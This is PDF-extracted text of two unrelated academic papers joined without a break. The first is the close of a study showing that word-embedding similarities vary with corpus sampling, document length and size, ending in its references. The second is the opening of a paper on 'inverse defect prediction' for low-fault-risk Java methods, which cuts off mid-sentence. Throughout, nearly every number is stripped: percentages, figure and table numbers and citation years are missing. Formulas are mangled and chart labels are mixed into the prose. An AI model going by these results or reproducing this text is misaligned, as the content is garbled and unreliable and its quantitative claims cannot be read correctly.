weed mdma tobacco nicotine cannabis m o st s im il a r w o rd s sgns fixed shuffled bootstrap . . . . . . . . cosine similarity possession growing smoked grams drugs distribute crack kilograms heroin cocaine m o st s im il a r w o rd s glove fixed shuffled bootstrap . . . . . . cosine similarity positive suspensions blaming steroid purposes addiction testing smoking procedures cocaine m o st s im il a r w o rd s glove fixed shuffled bootstrap . . . . . cosine similarity effects drugs caffeine weed drug thc tobacco smoke smoking cannabis m o st s im il a r w o rd s glove fixed shuffled bootstrap . . . . cosine similarity methamphetamine hydrochloride kilograms paraphernalia kilogram grams crack powder heroin cocaine m o st s im il a r w o rd s ppmi fixed shuffled bootstrap . . . . . cosine similarity steroid testing crack drugs substance positive tested alcohol drug cocaine m o st s im il a r w o rd s ppmi fixed shuffled bootstrap . . . . . . cosine similarity smoke smokers thc cigar cigarettes smoking weed tobacco nicotine cannabis m o st s im il a r w o rd s ppmi fixed shuffled bootstrap table : the most similar words with their means and standard deviations for the cosine similarities between the query word marijuana and its nearest neighbors (highest mean cosine similarity in the fixed setting. embeddings are learned from documents segmented by sentence. bootstrap setting causes large increases in varia- tion across all algorithms (with a weaker effect for ppmi) and corpora, with large standard deviations across word rankings. this indicates that the pres- ence of specific documents in the corpus can signifi- cantly affect the cosine similarities between embed- ding vectors. glove produced very similar embeddings in both the fixed and shuffled settings, with similar means and small standard deviations, which indi- cates that glove is not sensitive to document order. however, the bootstrap setting caused a reduc- tion in the mean and widened the standard deviation, indicating that glove is sensitive to the presence of specific documents. run run run run run run run viability fetus trimester surgery trimester pregnancies abdomen pregnancies pregnancies surgery visit surgery occupation tenure abortion gestation visit therapy incarceration viability stepfather abortions kindergarten tenure pain visit abortion wife fetus viability workday hospitalization arrival tenure groin gestation headaches abortions neck pain visit throat surgery pregnant hernia headaches headaches abortions grandmother expiration abortion summer trimester birthday pregnant daughter sudden pain suicide experiencing neck birthday panic fetal bladder abortion medications tenure fetus jaw table : the closest words to the query term pregnancy are highly variable. none of the words shown appear in every run. results are shown across runs of the bootstrap setting for the full corpus of the th circuit, the whole document size, and the sgns model. run run run run run run run selection selection selection selection selection selection selection genetics process human darwinian convergent evolutionary darwinian convergent darwinian humans theory darwinian humans nature process humans natural genetics evolutionary species evolutionary darwinian convergent genetics human genetics convergent convergent abiogenesis evolutionary species evolutionary theory process process evolutionary species did humans natural natural natural natural human convergent natural humans did species nature natural process convergent process human humans species theory evolutionary creationism human darwinian favor table : the order of the closest words to the query term evolution are highly variable. results are shown across runs of the bootstrap setting for the full corpus of askscience, the whole document length, and the glove model. these patterns of larger or smaller variations are generalized in figure , which shows the mean stan- dard deviation for different algorithms and settings. we calculated the standard deviation across the runs for each query word in each corpus, and then we averaged over these standard deviations. the re- sults show the average levels of variation for each algorithm and corpus. we observe that the fixed and shuffled settings for glove and lsa produce the least variable cosine similarities, while ppmi pro- duces the most variable cosine similarities for all settings. the presence of specific documents has a significant effect on all four algorithms (lesser for ppmi), consistently increasing the standard devia- tions. we turn to the question of how this variation in standard deviation affects the lists of most similar words. are the top-n words simply re-ordered, or do the words present in the list substantially change? table shows an example of the top-n word lists for the query word pregnancy in the th circuit corpus. observing run , we might believe that judges of the th circuit associate pregnancy most with questions of viability and abortion, while observ- ing run , we might believe that pregnancy is most associated with questions of prisons and family visits. although the lists in this table are all produced from the same corpus and document size, the membership of the lists changes substantially between runs of the bootstrap setting. as another example, table shows results for the query evolution for the glove model and the askscience corpus. although this query shows less variation between runs, we still find cause for concern. for example, run ranks the words human and humans highly, while run includes neither of those words in the top . these changes in top-n rank are shown in figure . for each query word for the askhistorians corpus, we find the n most similar words using sgns. we generate new top-n lists for each of the models trained in the bootstrap setting, and we use jac- card similarity to compare the lists. we observe similar patterns to the changes in standard deviation lsa sgns glove ppmi algorithm . . . . . . . . . . ja c c a r d s im il a r it y fixed shuffled bootstrap variation in top words lsa sgns glove ppmi algorithm . . . . . . . . . . ja c c a r d s im il a r it y fixed shuffled bootstrap variation in top words figure : the mean jaccard similarities across settings and algorithms for the top and closest words to the query words in the askhistorians corpus. larger jaccard similarity indicates more consistency in top n member- ship. results are shown for the sentence document length. in figure ; ppmi displays the lowest jaccard simi- larity across settings, while the other algorithms have higher similarities in the fixed and shuffled set- tings but much lower similarities in the bootstrap setting. we display results for both n = and n = , emphasizing that even very highly ranked words often drop out of the top-n list. even when words do not drop out of the top-n list, they often change in rank, as we observe in figure . we show both a specific example for the query term men and an aggregate of all the terms whose average rank is within the top- across runs of the bootstrap setting. in order to highlight the av- erage changes in rank, we do not show outliers in this figure, but we note that outliers (large falls and jumps in rank) are common. the variability across samples from the bootstrap setting indicates that the presence of specific documents can significantly affect the top-n rankings. we also find that document segmentation size af- rank children women soldiers boys girls horses officers people peasants bodies w o r d change in rank: "men" rank for current iteration a v e r a g e r a n k change in rank for all queries figure : the change in rank across runs of the boot- strap setting for the top words. we show results for both a single query, men, and an aggregate of all the queries, showing the change in rank of the words whose average ranking falls within the nearest neighbors of those queries. results are shown for sgns on the askhis- torians corpus and the sentence document length. fects the cosine similarities. figure shows that documents segmented at a more fine-grained level produce embeddings with less variability across runs of the bootstrap setting. documents segmented at the sentence level have standard deviations clustering closer to the median, while larger documents have standard deviations that are spread more widely. this effect is most significant for the th circuit and th circuit corpora, as these have much larger “docu- ments” than the other corpora. we observe a similar effect for corpus size in figure . the smaller corpus shows a larger spread in standard deviation than the larger corpus, indicating greater variability. finally, we find that the variance usually stabilizes at about runs of the bootstrap setting. figure shows that variability initially increases with the number of models trained. we observe this pattern across corpora, algorithms, and settings. rank . . . . . . s t a n d a r d d e v ia t io n document size comparison document size sentence whole figure : standard deviation of the cosine similarities between all rank n words and their nearest neighbors. results are shown for different document sizes (sentence vs whole document) in the bootstrap setting for sgns in the th circuit corpus. rank . . . . . . . . . s t a n d a r d d e v ia t io n corpus size comparison corpus size . . figure : standard deviation of the cosine similarities between all rank n words and their nearest neighbors. results are shown at different corpus sizes ( % vs % of documents) in the bootstrap setting for sgns in the th circuit corpus, segmented by sentence. discussion the most obvious result of our experiments is to emphasize that embeddings are not even a single objective view of a corpus, much less an objective view of language. the corpus is itself only a sample, and we have shown that the curation of this sample (its size, document length, and inclusion of specific documents) can cause significant variability in the embeddings. happily, this variability can be quan- tified by averaging results over multiple bootstrap samples. we can make several specific observations about al- gorithm sensitivities. in general, lsa, glove, sgns, and ppmi are not sensitive to document order in the collections we evaluated. this is surprising, as we number of iterations . . . . . m e a n (s t a n d a r d d e v ia t io n ) stability over iterations figure : the mean of the standard deviation of the cosine similarities between each query term and its nearest neighbors. results are shown for different numbers of runs of the bootstrap setting on the th circuit corpus. had expected sgns to be sensitive to document order and anecdotally, we had observed cases where the embeddings were affected by groups of documents (e.g. in a different language) at the beginning of train- ing. however, all four algorithms are sensitive to the presence of specific documents, though this effect is weaker for ppmi. although ppmi appears deterministic (due to its pre-computed word-context matrix), we find that this algorithm produced results under the fixed ordering whose variability was closest to the bootstrap set- ting. we attribute this intrinsic variability to the use of token-level subsampling. this sampling method introduces variation into the source corpus that ap- pears to be comparable to a bootstrap resampling method. sampling in ppmi is inspired by a similar method in the word vec implementation of sgns (levy et al., ). it is therefore surprising that sgns shows noticeable differentiation between the bootstrap setting on the one hand and the fixed and shuffled settings on the other. the use of embeddings as sources of evidence needs to be tempered with the understanding that fine- grained distinctions between cosine similarities are not reliable and that smaller corpora and longer docu- ments are more susceptible to variation in the cosine similarities between embeddings. when studying the top-n most similar words to a query, it is important to account for variation in these lists, as both rank and membership can significantly change across runs. therefore, we emphasize that with smaller corpora comes greater variability, and we recommend that practitioners use bootstrap sampling to generate an ensemble of word embeddings for each sub-corpus and present both the mean and variability of any sum- mary statistics such as ordered word similarities. we leave for future work a full hyperparameter sweep for the three algorithms. while these hyperpa- rameters can substantially impact performance, our goal with this work was not to achieve high perfor- mance but to examine how the algorithms respond to changes in the corpus. we make no claim that one algorithm is better than another. conclusion we find that there are several sources of variability in cosine similarities between word embeddings vec- tors. the size of the corpus, the length of individual documents, and the presence or absence of specific documents can all affect the resulting embeddings. while differences in word association are measur- able and are often significant, small differences in cosine similarity are not reliable, especially for small corpora. if the intention of a study is to learn about a specific corpus, we recommend that practitioners test the statistical confidence of similarities based on word embeddings by training on multiple bootstrap samples. acknowledgements this work was supported by nsf # , # , and the alfred p. sloan foundation. we would like to thank alexandra schofield, laure thompson, our action editor ivan titov, and our anonymous reviewers for their helpful comments. references yoshua bengio, réjean ducharme, pascal vincent, and christian jauvin. . a neural probabilistic lan- guage model. journal of machine learning research, (feb): – . david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. journal of machine learning research, (jan): – . tolga bolukbasi, kai-wei chang, james y. zou, venkatesh saligrama, and adam t. kalai. . man is to computer programmer as woman is to homemaker? debiasing word embeddings. in nips, pages – . léon bottou. . stochastic gradient descent tricks. in neural networks: tricks of the trade, pages – . springer. andreas broscheid. . comparing circuits: are some u.s. courts of appeals more liberal or conservative than others? law & society review, ( ), march. dallas card, amber e. boydstun, justin h. gross, philip resnik, and noah a. smith. . the media frames corpus: annotations of frames across issues. in acl. danqi chen and christopher d. manning. . a fast and accurate dependency parser using neural networks. in emnlp, pages – . colin cherry and hongyu guo. . the unreasonable effectiveness of word representations for twitter named entity recognition. in hlt-naacl, pages – . scott deerwester, susan t. dumais, george w. furnas, thomas k. landauer, and richard harshman. . indexing by latent semantic analysis. journal of the american society for information science, ( ): . manaal faruqui, jesse dodge, sujay k. jauhar, chris dyer, eduard hovy, and noah a. smith. . retrofitting word vectors to semantic lexicons. hlt-acl, pages – . anna gladkova and aleksandr drozd. . intrinsic evaluations of word embeddings: what can we do bet- ter? in proceedings of the st workshop on evaluating vector-space representations for nlp, pages – . yoav goldberg. . neural network methods for nat- ural language processing. synthesis lectures on hu- man language technologies. morgan & claypool pub- lishers. ian goodfellow, yoshua bengio, and aaron courville. . deep learning. mit press. nathan halko, per-gunnar martinsson, and joel a. tropp. september, . finding structure with randomness: stochastic algorithms for constructing approximate ma- trix decompositions. technical report no. - . applied & computational mathematics, california in- stitute of technology. william l. hamilton, jure leskovec, and dan jurafsky. . diachronic word embeddings reveal statistical laws of semantic change. in acl. johannes hellrich and udo hahn. . bad company– neighborhoods in neural embedding spaces considered harmful. in proceedings of coling , the th in- ternational conference on computational linguistics: technical papers, pages – . ryan heuser. . word vectors in the eighteenth- century. in ipam workshop: cultural analytics. yoon kim, yi-i chiu, kentaro hanaki, darshan hegde, and slav petrov. . temporal analysis of language through neural language models. proceedings of the acl workshop on language technologies and computational social science,. vivek kulkarni, bryan perozzi, and steven skiena. . freshman or fresher? quantifying the geographic vari- ation of language in online social media. in icwsm, pages – . thomas k. landauer and susan t. dumais. . a so- lution to plato’s problem: the latent semantic analysis theory of acquisition, induction, and representation of knowledge. psychological review, ( ): . omer levy and yoav goldberg. . neural word embedding as implicit matrix factorization. in nips, pages – . omer levy, yoav goldberg, and ido dagan. . im- proving distributional similarity with lessons learned from word embeddings. transactions of the acl, : – . rasmus e. madsen, david kauchak, and charles elkan. . modeling word burstiness using the dirichlet dis- tribution. in proceedings of the nd international con- ference on machine learning, pages – . acm. tomas mikolov, wen-tau yih, and geoffrey zweig. . linguistic regularities in continuous space word rep- resentations. hlt-naacl. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word representation. in emnlp, volume , pages – . lawrence phillips, kyle shaffer, dustin arendt, nathan hodas, and svitlana volkova. . intrinsic and ex- trinsic evaluation of spatiotemporal text representations in twitter streams. in proceedings of the nd workshop on representation learning for nlp, pages – . radim řehůřek and petr sojka. . software frame- work for topic modelling with large corpora. in pro- ceedings of the lrec workshop on new chal- lenges for nlp frameworks, pages – , valletta, malta, may. elra. evan sandhaus. . the new york times annotated corpus. ldc t . linguistic data consortium. noam shazeer, ryan doherty, colin evans, and chris waterson. . swivel: improving embeddings by noticing what’s missing. arxiv: . . yingtao tian, vivek kulkarni, bryan perozzi, and steven skiena. . on the convergent properties of word embedding methods. arxiv preprint arxiv: . . joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of the acl, pages – . association for computational linguistics. peter d. turney and patrick pantel. . from frequency to meaning: vector space models of semantics. journal of artificial intelligence research, : – . ivan vulic and marie-francine moens. . bilingual word embeddings from non-parallel document-aligned data applied to bilingual lexicon induction. in proceed- ings of the acl, pages – . acl. justine zhang, william l. hamilton, cristian danescu- niculescu-mizil, dan jurafsky, and jure leskovec. . community identity and user engagement in a multi-community landscape. proceedings of icwsm. too trivial to test? an inverse view on defect prediction to identify methods with low fault risk too trivial to test? an inverse view on defect prediction to identify methods with low fault risk rainer niedermayr , , tobias röhm and stefan wagner cqse gmbh, münchen, germany institute of software technology, university of stuttgart, stuttgart, germany abstract background: test resources are usually limited and therefore it is often not possible to completely test an application before a release. to cope with the problem of scarce resources, development teams can apply defect prediction to identify fault-prone code regions. however, defect prediction tends to low precision in cross-project prediction scenarios. aims: we take an inverse view on defect prediction and aim to identify methods that can be deferred when testing because they contain hardly any faults due to their code being “trivial”. we expect that characteristics of such methods might be project-independent, so that our approach could improve cross-project predictions. method: we compute code metrics and apply association rule mining to create rules for identifying methods with low fault risk (lfr). we conduct an empirical study to assess our approach with six java open-source projects containing precise fault data at the method level. results: our results show that inverse defect prediction can identify approx. – % of the methods of a project to have a lfr; on average, they are about six times less likely to contain a fault than other methods. in cross-project predictions with larger, more diversified training sets, identified methods are even times less likely to contain a fault. conclusions: inverse defect prediction supports the efficient allocation of test resources by identifying methods that can be treated with less priority in testing activities and is well applicable in cross-project prediction scenarios. subjects data mining and machine learning, software engineering keywords testing, inverse defect prediction, fault risk, low-fault-risk methods introduction in a perfect world, it would be possible to completely test every new version of a software application before it was deployed into production. in practice, however, software development teams often face a problem of scarce test resources. developers are busy implementing features and bug fixes, and may lack time to develop enough automated unit tests to comprehensively test new code (ostrand, weyuker & bell, ; menzies & di stefano, ). furthermore, testing is costly and, depending on the criticality of a system, it may not be cost-effective to expend equal test effort to all components (zhang, zhang & gu, ). hence, development teams need to prioritize and limit their testing scope by restricting the code regions to be tested (menzies et al., ; how to cite this article niedermayr r, röhm t, wagner s. . too trivial to test? an inverse view on defect prediction to identify methods with low fault risk. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted march published april corresponding author rainer niedermayr, niedermayr@cqse.eu academic editor mario luca bernardi additional information and declarations can be found on page doi . /peerj-cs. copyright niedermayr et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:niedermayr@�cqse.�eu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ bertolino, ). to cope with the problem of scarce test resources, development teams aim to test code regions that have the best cost-benefit ratio regarding fault detection. to support development teams in this activity, defect prediction has been developed and studied extensively in the last decades (hall et al., ; d’ambros, lanza & robbes, ; catal, ). defect prediction identifies code regions that are likely to contain a fault and should therefore be tested (menzies, greenwald & frank, ; weyuker & ostrand, ). this paper suggests, implements, and evaluates another view on defect prediction: inverse defect prediction (idp). the idea behind idp is to identify code artifacts (e.g., methods) that are so trivial that they contain hardly any faults and thus can be deferred or ignored in testing. like traditional defect prediction, idp also uses a set of metrics that characterize artifacts, applies transformations to pre-process metrics, and uses a machine-learning classifier to build a prediction model. the difference rather lies in the predicted classes. while defect prediction classifies an artifact either as buggy or non-buggy, idp identifies methods that exhibit a low fault risk (lfr) with high certainty and does not make an assumption about the remaining methods, for which the fault risk is at least medium or cannot be reliably determined. as a consequence, the objective of the prediction also differs. defect prediction aims to achieve a high recall, such that as many faults as possible can be detected, and a high precision, such that only few false positives occur. in contrast, idp aims to achieve high precision to ensure that lfr methods contain indeed hardly any faults, but it does not necessarily seek to predict all non-faulty methods. still, it is desired that idp achieves a sufficiently high recall such that a reasonable reduction potential arises when treating lfr methods with a lower priority in qa activities. research goal: we want to study whether idp can reliably identify code regions that exhibit only a lfr, whether ignoring such code regions—as done silently in defect prediction—is a good idea, and whether idp can be used in cross-project predictions. to implement idp, we calculated code metrics for each method of a code base and trained a classifier for methods with lfr using association rule mining. to evaluate idp, we performed an empirical study with the defects j dataset (just, jalali & ernst, ) consisting of real faults from six open-source projects. we applied static code analysis and classifier learning on these code bases and evaluated the results. we hypothesize that idp can be used to pragmatically address the problem of scarce test resources. more specifically, we hypothesize that a generalized idp model can be used to identify code regions that can be deferred when writing automated tests if none yet exist, as is the situation for many legacy code bases. contributions: ( ) the idea of an inverse view on defect prediction: while defect prediction has been studied extensively in the last decades, it has always been employed to identify code regions with high fault risk. to the best of our knowledge, the present paper is the first to study the identification of code regions with lfr explicitly. ( ) an empirical study about the performance of idp on real open-source code bases. ( ) an extension to the defects j dataset (just, jalali & ernst, ): to improve data quality and enable further research—reproduction in particular—we provide code metrics for all methods in the code bases and an indication whether they were changed in a bug-fix niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ patch, a list of methods that changed in bug fixes only to preserve api compatibility, and association rules to identify lfr methods. the remainder of this paper is organized as follows. “association rule mining” provides background information about association rule mining. “related work” discusses related work. “idp approach” describes the idp approach, that is, the computation of the metrics for each method, the data pre-processing, and the association rule mining to identify methods with lfr. afterward, “empirical study” summarizes the design and results of the idp study with the defects j dataset. then, “discussion” discusses the study’s results, implications, and threats to validity. finally, “conclusion” summarizes the main findings and sketches future work. association rule mining association rule mining is a technique for identifying relations between variables in a large dataset and was introduced by agrawal, imieli�nski & swami ( ). a dataset contains transactions consisting of a set of items that are binary attributes. an association rule represents a logical implication of the form {antecedent} / {consequent} and expresses that the consequent is likely to apply if the antecedent applies. antecedent and consequent both consist of a set of items and are disjoint. the support of a rule expresses the proportion of the transactions that contain both antecedent and consequent out of all transactions. the support of an item x with respect to all transactions t is defined as suppðxÞ ¼ t t:x�tj jtj j . it is related to the significance of the itemset (simon, kumar & li, ). the confidence of a rule expresses the proportion of the transactions that contain both antecedent and consequent out of all transactions that contain the antecedent. the confidence of a rule x / y is defined as confðx ! yÞ ¼ suppðx[yÞsuppðxÞ . it can be considered as the precision (simon, kumar & li, ). a rule is redundant if a more general rule with the same or a higher confidence value exists (bayardo, agrawal & gunopulos, ). association rule mining has been successfully applied in defect prediction studies (song et al., ; czibula, marian & czibula, ; ma et al., ; zafar et al., ). a major advantage of association rule mining is the natural comprehensibility of the rules (simon, kumar & li, ). other commonly used machine-learning algorithms for defect prediction, such as support vector machines or naive bayes classifiers, generate black-box models, which lack interpretability. even decision trees can be difficult to interpret due to the subtree-replication problem (simon, kumar & li, ). another advantage of association rule mining is that the gained rules implicitly extract high-order interactions among the predictors. related work defect prediction is an important research area that has been extensively studied (hall et al., ; catal & diri, ). defect prediction models use code metrics (menzies, greenwald & frank, ; nagappan, ball & zeller, ; d’ambros, lanza & robbes, ; zimmermann, premraj & zeller, ), change metrics (nagappan & ball, ; hassan, ; kim et al., ), or a variety of further metrics (such as code ownership (bird et al., ; rahman & devanbu, ), developer interactions (meneely et al., ; niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lee et al., ), dependencies to binaries (zimmermann & nagappan, ), mutants (bowes et al., ), code smells (palomba et al., ) to predict code areas that are especially defect-prone. such models allow software engineers to focus quality-assurance efforts on these areas and thereby support a more efficient resource allocation (menzies, greenwald & frank, ; weyuker & ostrand, ). defect prediction is usually performed at the component, package or file level (nagappan & ball, ; nagappan, ball & zeller, ; bacchelli, d’ambros & lanza, ; scanniello et al., ). recently, more fine-grained prediction models have been proposed to narrow down the scope for quality-assurance activities. kim, whitehead & zhang ( ) presented a model to classify software changes. hata, mizuno & kikuno ( ) applied defect prediction at the method level and showed that fine-grained prediction outperforms coarse-grained prediction at the file or package level if efforts to find the faults are considered. giger et al. ( ) also investigated prediction models at the method level and concluded that a random forest model operating on change metrics can achieve good performance. more recently, pascarella, palomba & bacchelli ( ) replicated this study and confirmed the results. however, they reported that a more realistic inter-release evaluation of the models shows a dramatic drop in performance with results close to that of a random classifier and concluded that method-level bug prediction is still an open challenge (pascarella, palomba & bacchelli, ). it is considered difficult to achieve sufficiently good data quality at the method level (hata, mizuno & kikuno, ; shippey et al., ); publicly available datasets have been provided in shippey et al. ( ), just, jalali & ernst ( ), and giger et al. ( ). cross-project defect prediction predicts defects in projects for which no historical data exists by using models trained on data of other projects (zimmermann et al., ; xia et al., ). he et al. ( ) investigated the usability of cross-project defect prediction. they reported that cross-project defect prediction works only in few cases and requires careful selection of training data. zimmermann et al. ( ) also provided empirical evidence that cross-project prediction is a serious problem. they stated that projects in the same domain cannot be used to build accurate prediction models without quantifying, understanding, and evaluating process, data and domain. similar findings were obtained by turhan et al. ( ), who investigated the use of cross-company data for building prediction models. they found that models using cross-company data can only be “useful in extreme cases such as mission-critical projects, where the cost of false alarms can be afforded” and suggested using within-company data if available. while some recent studies reported advances in cross-project defect prediction (xia et al., ; zhang et al., ; xu et al., ), it is still considered as a challenging task. our work differs from the above-mentioned work in the target setting: we do not predict artifacts that are fault-prone, but instead identify artifacts (methods) that are very unlikely to contain any faults. while defect prediction aims to detect as many faults as possible (without too many false positives), and thus strives for a high recall (mende & koschke, ), our idp approach strives to identify those methods that are not fault-prone to a high certainty. therefore, we optimized our approach toward the precision in detecting lfr methods. to the best of our knowledge, this is the first work to niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ study lfr methods. moreover, as far as we know, cross-project prediction has not yet been applied at the method level. to perform the classification, we applied association rule mining. association rule mining has previously been applied with success in defect prediction (song et al., ; morisaki et al., ; czibula, marian & czibula, ; ma et al., ; karthik & manikandan, ; zafar et al., ). idp approach this section describes the idp approach, which identifies lfr methods. the approach comprises the computation of source-code metrics for each method, the data pre- processing before the mining, and the association rule mining. figure illustrates the steps. metric computation like defect prediction models, idp uses metrics to train a classifier for identifying lfr methods. for each method, we compute the source-code metrics listed in table that we considered relevant to judge whether a method is trivial. they comprise established length and complexity metrics used in defect prediction, metrics regarding occurrences of programming-language constructs, and categories describing the purpose of a method. sloc is the number of source lines of code, that is, loc without empty lines and comments. cyclomatic complexity corresponds to the metric proposed by mccabe ( ). despite this metric being controversial (shepperd, ; hummel, )—due to the fact that it is not actionable, difficult to interpret, and high values do not necessarily translate to low readability—it is commonly used as variable in defect prediction (menzies et al., , ; zimmermann, premraj & zeller, ). furthermore, a low number of paths through a method could be relevant for identifying lfr methods. figure overview of the approach. metrics for faulty methods are computed at the faulty state; metrics for non-faulty methods are computed at the state of the last bug-fix commit. full-size doi: . /peerj-cs. /fig- niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ maximum nesting depth corresponds to the “maximum number of encapsulated scopes inside the body of the method” (ndepend, ). deeply nested code is more difficult to understand, therefore, it could be more fault-prone. maximum method chaining expresses the maximum number of chain elements of a method invocation. we consider a method call to be chained if it is directly invoked on the result from the previous method invocation. the value for a method is zero if it does not contain any method invocations, one if no method invocation is chained, or otherwise the maximum number of chain elements (e.g., two for getid().tostring(), three for getid().tostring(). substring( )). unique variable identifiers counts the distinct names of variables that are used within the method. the following metrics, metrics m –m , count the occurrences of the respective java language construct (gosling et al., ). next, we derive further metrics from the existing ones. they are redundant, but correlated metrics do not have any negative effects on association rule mining (except on the computation time) and may improve the results for the following reason: if an item generated from a metric is not frequent, rules with this item will be discarded because they cannot achieve the minimum support; however, an item for a more general metric may be more frequent and survive. the derived metrics are: � all conditions, which sums up if conditions, switch-case blocks, and ternary operations (m + m + m ) � all arithmetic operations, which sums up incrementations, decrementations, and arithmetic infix operations (m + m ) furthermore, we compute to which of the following categories a method belongs (a method can belong to zero, one, or more categories): � constructors: special methods that create and initialize an instance of a class. they might be less fault-prone because they often only set class variables or delegate to another constructor. � getters: methods that return a class or instance variable. they usually consist of a single statement and can be generated by the ide. � setters: methods that set the value of a class or instance variable. they usually consist of a single statement and can be generated by the ide. � empty methods: non-abstract methods without any statements. they often exist to meet an implemented interface, or because the default logic is to do nothing and is supposed to be overridden in certain sub-classes. � delegation methods: methods that delegate the call to another method with the same name and further parameters. they often do not contain any logic besides the delegation. � tostring methods: implementations of java’s tostring method. they are often used only for debugging purposes and can be generated by the ide. note that we only use source-code metrics and do not consider process metrics. this is because we want to identify methods that exhibit a lfr due to their code. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ association rule mining computes frequent item sets from categorical attributes; therefore, our next step is to discretize the numerical metrics. in defect prediction, discretization is also applied to the metrics: shivaji et al. ( ) and mccallum & nigam ( ) reported that table computed metrics for each method. metric name type m source lines of code (sloc) length m cyclomatic complexity (cc) complexity m maximum nesting depth maximum value m maximum method chaining maximum value m unique variable identifiers unique count m anonymous class declarations count m arithmetic in- or decrementations count m arithmetic infix operations count m array accesses count m array creations count m assignments count m boolean operators count m cast expressions count m catch clauses count m comparison operators count m if conditions count m inner method declarations count m instance-of checks count m instantiations count m loops count m method invocations count m null checks count m null literals count m return statements count m string literals count m super-method invocations count m switch-case blocks count m synchronized blocks count m ternary operations count m throw statements count m try blocks count m all conditions count m all arithmetic operations count m is constructor boolean m is setter boolean m is getter boolean m is empty method boolean m is delegation method boolean m is tostring method boolean niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ binary values can yield better results than using counts when the number of features is low. we discretize as follows: � for each of the metrics m –m , we inspect their distribution and create three classes. the first class is for metric values until the first tertile, the second class for values until the second tertile, and the third class for the remaining values. � for all count metrics (including the derived ones), we create a binary “has-no”-metric, which is true if the value is zero, e.g., countloops = ⇒ noloops = true. � for the method categories (setter, getter, : : : ), no transformation is necessary as they are already binary. data pre-processing at this point, we assume that we have a list of faulty methods with their metrics at the faulty state (the list may contain a method multiple times if it was fixed multiple times) and a list of all methods. faulty methods can be obtained by identifying methods that were changed in bug-fix commits (zimmermann, premraj & zeller, ; giger et al., ; shippey et al., ). a method is considered as faulty when it was faulty at least once in its history; otherwise it is considered as not faulty. we describe in “fault data extraction” how we extracted faulty methods from the defects j dataset. prior to applying the mining algorithm, we have ( ) to address faulty methods with multiple occurrences, ( ) to create a unified list of faulty and non-faulty methods, and ( ) to tackle dataset imbalance. steps ( ) and ( ) require that a method can be uniquely identified. to satisfy this requirement, we identified a method by its name, its parameter types, and the qualified name of its surrounding class. we integrated the computation of the metrics into the source-code analysis tool teamscale (heinemann, hummel & steidl, ; haas, niedermayr & jurgens, ), which is aware of the code history and tracks method genealogies. thereby, teamscale detects method renames or parameter changes so that we could update the method identifier when it changed. ( ) a method may be fixed multiple times; in this case, a method appears multiple times in the list of the faulty methods. however, each method should have the same weight and should therefore be considered only once. consequently, we consolidate multiple occurrences of the same method: we replace all occurrences by a new instance and apply majority voting to aggregate the binary metric values. it is common practice in defect prediction to have a single instance of every method with a flag that indicates whether a method was faulty at least once (menzies et al., ; giger et al., ; shippey et al., ; mende & koschke, ). ( ) to create a unified dataset, we take the list of all methods, remove those methods that exist in the set of the faulty methods, and add the set of the faulty methods with the metrics computed at the faulty state. after doing that, we end up with a list containing each method exactly once and a flag indicating whether a method was faulty or not. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ( ) defect datasets are often highly imbalanced (khoshgoftaar, gao & seliya, ), with faulty methods being underrepresented. therefore, we apply smote , a well- known algorithm for over- and under-sampling, to address imbalance in the dataset used for training (longadge, dongre & malik, ; chawla et al., ). it artificially generates new entries of the minority class using the nearest neighbors of these cases and reduces entries from the majority class (torgo, ). if we do not apply smote to highly imbalanced datasets, many non-expressive rules will be generated when most methods are not faulty. for example, if % of the methods are not faulty and % of them contain a method invocation, rules with high support will be generated that use this association to identify non-faulty methods. balancing avoids those nonsense rules. idp classifier to identify lfr methods, we compute association rules of the type {metric , metric , metric , : : : } / {notfaulty}. examples for the metrics are sloclowestthird, nonullchecks, issetter. a method that satisfies all metric predicates of a rule is not faulty to the certainty expressed by the confidence of the rule. the support of the rule expresses how many methods with these characteristics exist, and thus, it shows how generalizable the rule is. after computing the rules on a training set, we remove redundant ones (see “association rule mining”) and order the remaining rules first descending by their confidence and then by their support. to build the lfr classifier, we combine the top n association rules with the highest confidence values using the logical-or operator. hence, we consider a method to have a lfr if at least one of the top n rules matches. to determine n, we compute the maximum number of rules until the faulty methods in the lfr methods exceed a certain threshold in the training set. of course, idp can also be used with other machine-learning algorithms. we decided to use association rule mining because of the natural comprehensibility of the rules (see “association rule mining”) and because we achieved a better performance compared to models we trained using random forest. empirical study this section reports on the empirical study that we conducted to evaluate the idp approach. research questions we investigate the following questions to research how well methods that contain hardly any faults can be identified and to study whether idp is applicable in cross-project scenarios. rq : what is the precision of the classifier for low-fault-risk methods? to evaluate the precision of the classifier, we investigate how many methods that are classified as “lfr” (due to the triviality of their code) are faulty. if we want to use the lfr classifier for determining methods that require less focus during quality assurance (qa) activities, synthetic minority over-sampling technique. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ such as testing and code reviews, we need to be sure that these methods contain hardly any faults. rq : how large is the fraction of the code base consisting of methods classified as “low fault risk”? we study how common lfr methods are in code bases to find out how much code is of lower importance for quality-assurance activities. we want to determine which savings potential can arise if these methods are excluded from qa. rq : is a trained classifier for methods with low fault risk generalizable to other projects? cross-project 